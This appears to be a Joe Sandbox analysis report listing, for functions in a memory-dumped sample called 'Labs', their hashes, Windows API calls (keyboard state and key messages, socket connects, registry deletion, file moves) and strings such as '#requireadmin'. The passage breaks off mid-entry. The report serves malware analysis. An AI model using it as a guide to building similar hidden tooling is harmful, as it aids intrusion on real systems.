                                                    • Opcode ID: 97f78c33f7ec37ebeeccbef65fba5d16953e99ff7af73462bb508ca554a630e0
                                                    • Instruction ID: 06a7e01cdaf60fb48e4c9b1daa0b1623f4e17500bf871d460aceeaacc64aa3bd
                                                    • Opcode Fuzzy Hash: 97f78c33f7ec37ebeeccbef65fba5d16953e99ff7af73462bb508ca554a630e0
                                                    • Instruction Fuzzy Hash: 0A61CF74A00619DFCF14EFA5C4949AEB7F4FF48310F208469E84AAB761DB38AD41CB90
                                                    APIs
                                                    • GetParent.USER32(?), ref: 007D178B
                                                    • GetKeyboardState.USER32(?), ref: 007D17A0
                                                    • SetKeyboardState.USER32(?), ref: 007D1801
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 007D182F
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 007D184E
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 007D1894
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007D18B7
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
                                                    • Instruction ID: 10aeba9f3930c74aac90bc3280c5386607025231b06a7c17d7cc782e3d119de4
                                                    • Opcode Fuzzy Hash: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
                                                    • Instruction Fuzzy Hash: 4A51E6A0A087D53DFB368234CC55BBA7EF96B06310F4C858AE0D556AD2D29CECD4E750
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 007D15A4
                                                    • GetKeyboardState.USER32(?), ref: 007D15B9
                                                    • SetKeyboardState.USER32(?), ref: 007D161A
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D1646
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D1663
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007D16A7
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D16C8
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
                                                    • Instruction ID: ed89db71611dc9ff5864626f7fbdb0926e2491b89b4d14172ccfdecd7455bd3d
                                                    • Opcode Fuzzy Hash: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
                                                    • Instruction Fuzzy Hash: 155117A06447D53DFB328724CC05BBA7EB96F46300F4C858AE0D546AC3DA9CEC98E750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
                                                    • Instruction ID: 47f579177196b83e7049db568dafdbd1fd097f7349d8ce4274e339b451a4b3c9
                                                    • Opcode Fuzzy Hash: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
                                                    • Instruction Fuzzy Hash: 71416076C20618B6CF11FBF4988E9CFB7B9AF04310F514856E519E3212E638A61687A6
                                                    APIs
                                                      • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0
                                                      • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 007D3BAA
                                                    • _wcscmp.LIBCMT ref: 007D3BC6
                                                    • MoveFileW.KERNEL32(?,?), ref: 007D3BDE
                                                    • _wcscat.LIBCMT ref: 007D3C26
                                                    • SHFileOperationW.SHELL32(?), ref: 007D3C92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: 45ce2c256bdf217e180bd449ef13a0d76a6f66f1aa95b53286838f8ec005afd6
                                                    • Instruction ID: 32cd4d23965c6f7f43f5c8fc64d65fda2503a3fd7c25bc6f7453218954bde14d
                                                    • Opcode Fuzzy Hash: 45ce2c256bdf217e180bd449ef13a0d76a6f66f1aa95b53286838f8ec005afd6
                                                    • Instruction Fuzzy Hash: 454160B1508344AAC752EB64D485ADBB7FCAF88340F40092FF489D3251EB38D6488B56
                                                    APIs
                                                    • _memset.LIBCMT ref: 007F78CF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7976
                                                    • IsMenu.USER32(?), ref: 007F798E
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F79D6
                                                    • DrawMenuBar.USER32 ref: 007F79E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0
                                                    • API String ID: 3866635326-4108050209
                                                    • Opcode ID: 9b84937e3bbfc74a6cf848616badf2131f83f449e2c2ea6a2a1a9e11f2d39089
                                                    • Instruction ID: b5053c9088906a7f25f25ec42c712f945d437e04edf0b909306191ebc41a8573
                                                    • Opcode Fuzzy Hash: 9b84937e3bbfc74a6cf848616badf2131f83f449e2c2ea6a2a1a9e11f2d39089
                                                    • Instruction Fuzzy Hash: FF414871A08209EFDB24DF54D884EEABBB9FB05310F04812DEA55AB350C778AD50CFA0
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007F1631
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F165B
                                                    • FreeLibrary.KERNEL32(00000000), ref: 007F1712
                                                      • Part of subcall function 007F1602: RegCloseKey.ADVAPI32(?), ref: 007F1678
                                                      • Part of subcall function 007F1602: FreeLibrary.KERNEL32(?), ref: 007F16CA
                                                      • Part of subcall function 007F1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007F16ED
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 007F16B5
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: a957959dad55fb92233fbfa8816d0eb8d6e2a7d7bdb6dff37159dfa72c4a8ea5
                                                    • Instruction ID: f80912f82fda560e4262f456500c005c073323c414fb589e1f6a218901b70d8c
                                                    • Opcode Fuzzy Hash: a957959dad55fb92233fbfa8816d0eb8d6e2a7d7bdb6dff37159dfa72c4a8ea5
                                                    • Instruction Fuzzy Hash: DD311AB190110DFFDB14DB90DC89AFEB7BCEF08301F44016AEA05E2250EB789E459AA0
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007F6911
                                                    • GetWindowLongW.USER32(01204CE8,000000F0), ref: 007F6944
                                                    • GetWindowLongW.USER32(01204CE8,000000F0), ref: 007F6979
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007F69AB
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007F69D5
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 007F69E6
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F6A00
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: 9905bcaec64f1fce7cc58126199bcd714da8eee1face9c337169e4fba4dffcba
                                                    • Instruction ID: 9deec4809277f2135de60aca1951426b4d8a31f0bdbdcb2d803a14088e7b46fa
                                                    • Opcode Fuzzy Hash: 9905bcaec64f1fce7cc58126199bcd714da8eee1face9c337169e4fba4dffcba
                                                    • Instruction Fuzzy Hash: 98310270604258AFDB21CF28DC88F6537E1FB8A711F1901A8F6548B2A2CBB6BC40DB50
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2CA
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2F0
                                                    • SysAllocString.OLEAUT32(00000000), ref: 007CE2F3
                                                    • SysAllocString.OLEAUT32(?), ref: 007CE311
                                                    • SysFreeString.OLEAUT32(?), ref: 007CE31A
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007CE33F
                                                    • SysAllocString.OLEAUT32(?), ref: 007CE34D
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 96b8eb78d5f4a1eb2cffb7d45da923830b63fb8b2fca0bbc9829035c80ec4be9
                                                    • Instruction ID: c64562b7536f5f5c4cf7d827267007630bb91ff98bdbbf829f2a3b34ba326a8f
                                                    • Opcode Fuzzy Hash: 96b8eb78d5f4a1eb2cffb7d45da923830b63fb8b2fca0bbc9829035c80ec4be9
                                                    • Instruction Fuzzy Hash: 9C21B732600609AFDF50DFA8DC88EBB77ACFB08360B04812DFA14DB250DA74AC418B64
                                                    APIs
                                                      • Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E68B1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E68C0
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E68F9
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 007E6902
                                                    • WSAGetLastError.WSOCK32 ref: 007E690C
                                                    • closesocket.WSOCK32(00000000), ref: 007E6935
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E694E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: eccfa0057928f9e524b4a57985c23b6d2c4dd77c46c2408e775e5c409a0718db
                                                    • Instruction ID: c9a373265cc015c344d66141ce262eab8e07b09e3e52805e535c6f80c8c290e8
                                                    • Opcode Fuzzy Hash: eccfa0057928f9e524b4a57985c23b6d2c4dd77c46c2408e775e5c409a0718db
                                                    • Instruction Fuzzy Hash: 0131A471600208EFDB109F65CC89BB977A9EB58765F048029F909A7291DB78AC048BA1
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3A5
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3CB
                                                    • SysAllocString.OLEAUT32(00000000), ref: 007CE3CE
                                                    • SysAllocString.OLEAUT32 ref: 007CE3EF
                                                    • SysFreeString.OLEAUT32 ref: 007CE3F8
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007CE412
                                                    • SysAllocString.OLEAUT32(?), ref: 007CE420
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: f03c8ed9d6ccd45aef01c3f86ac42a8d6cb33dedd5295b6067e35569a3684750
                                                    • Instruction ID: 925619e9d7eeb667d46656aaa64e44d5341a38f975a7c7c1fb8bf50b29c5402e
                                                    • Opcode Fuzzy Hash: f03c8ed9d6ccd45aef01c3f86ac42a8d6cb33dedd5295b6067e35569a3684750
                                                    • Instruction Fuzzy Hash: C7219835604205AFEB549FB8DC88EAF77ECFB08360B00812DF915CB261DA78ED418B64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: 34c46556872b0baca8c176896df5070effb5267b8cc6fc4f694e511aa13cc0d5
                                                    • Instruction ID: e978957311d0b3ebec17c846af6dd9f9f7ec56d89ef79ca4bf61562ef8e42d1a
                                                    • Opcode Fuzzy Hash: 34c46556872b0baca8c176896df5070effb5267b8cc6fc4f694e511aa13cc0d5
                                                    • Instruction Fuzzy Hash: 06214C32100111A6D730BA259C0AFB773DAEF51710F54443EF856871A3E7AD9D42C395
                                                    APIs
                                                      • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                      • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                      • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F7C57
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F7C64
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F7C6F
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F7C7E
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F7C8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: e635724a5d86c99fe2b7f11f05eb6c914c7eb72cb3b4f7117ddf52e5ebdb04f0
                                                    • Instruction ID: 44100a3571fb5305afbf5c85835b3d90b318b4b21e46e9f19fce7edf4d7d9789
                                                    • Opcode Fuzzy Hash: e635724a5d86c99fe2b7f11f05eb6c914c7eb72cb3b4f7117ddf52e5ebdb04f0
                                                    • Instruction Fuzzy Hash: 9B1190B214021DBEEF158F60CC85EFB7F6EEF08798F014114BB08A2190DA769C21DBA0
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 00799D16
                                                      • Part of subcall function 007933B7: EncodePointer.KERNEL32(00000000), ref: 007933BA
                                                      • Part of subcall function 007933B7: __initp_misc_winsig.LIBCMT ref: 007933D5
                                                      • Part of subcall function 007933B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0079A0D0
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0079A0E4
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0079A0F7
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0079A10A
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0079A11D
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0079A130
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0079A143
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0079A156
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0079A169
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0079A17C
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0079A18F
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0079A1A2
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0079A1B5
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0079A1C8
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0079A1DB
                                                      • Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0079A1EE
                                                    • __mtinitlocks.LIBCMT ref: 00799D1B
                                                    • __mtterm.LIBCMT ref: 00799D24
                                                      • Part of subcall function 00799D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00799D29,00797EFD,0082CD38,00000014), ref: 00799E86
                                                      • Part of subcall function 00799D8C: _free.LIBCMT ref: 00799E8D
                                                      • Part of subcall function 00799D8C: DeleteCriticalSection.KERNEL32(00830C00,?,?,00799D29,00797EFD,0082CD38,00000014), ref: 00799EAF
                                                    • __calloc_crt.LIBCMT ref: 00799D49
                                                    • __initptd.LIBCMT ref: 00799D6B
                                                    • GetCurrentThreadId.KERNEL32 ref: 00799D72
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 3567560977-0
                                                    • Opcode ID: e8596d85880a8da1b9149f69f12c324cecc37d05af33477eddd079c160b7ec0c
                                                    • Instruction ID: 1bdcfd27b23e4a25bb5f233eb979d4cc3c8caec7a3278781186c0917420578f0
                                                    • Opcode Fuzzy Hash: e8596d85880a8da1b9149f69f12c324cecc37d05af33477eddd079c160b7ec0c
                                                    • Instruction Fuzzy Hash: 55F0CD32A0A711AAFF347B3C7C4B38ABA94EF42730F20461DF6A0C50D2EF19880045A1
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00794282,?), ref: 007941D3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 007941DA
                                                    • EncodePointer.KERNEL32(00000000), ref: 007941E6
                                                    • DecodePointer.KERNEL32(00000001,00794282,?), ref: 00794203
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: 74d3506f3f9be15277b6e553b41b4ccde06ad00b167c04ec99902dea3833143e
                                                    • Instruction ID: e76f06c3c6270ca5cb81658faec6e4916630ed6e19ecd53e6a429b89fbccd140
                                                    • Opcode Fuzzy Hash: 74d3506f3f9be15277b6e553b41b4ccde06ad00b167c04ec99902dea3833143e
                                                    • Instruction Fuzzy Hash: 0DE01A70690741AFEF911B70EC4DB293AA9B755B06F604824B911D51F4CBF940858F00
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007941A8), ref: 007942A8
